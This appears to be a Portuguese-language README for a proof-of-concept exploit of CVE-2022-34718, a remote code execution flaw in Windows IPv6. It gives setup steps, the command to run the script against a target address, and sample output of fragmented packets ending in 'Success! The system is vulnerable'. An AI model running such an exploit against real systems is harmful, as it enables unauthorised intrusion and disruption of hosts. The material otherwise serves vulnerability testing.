
Este repositório contém um exploit da CVE-2022-34718, uma vulnerabilidade de execução remota de código (RCE) no IPv6 em sistemas Windows.
Como a vulnerabilidade requer pacotes IPv6 especialmente elaborados, ela depende do módulo Scapy e, portanto, precisa ser executada como root. O método recomendado para executar esta PoC é por meio de um ambiente virtual, assim:
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
O script informará se o sistema alvo é vulnerável a este exploit.
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...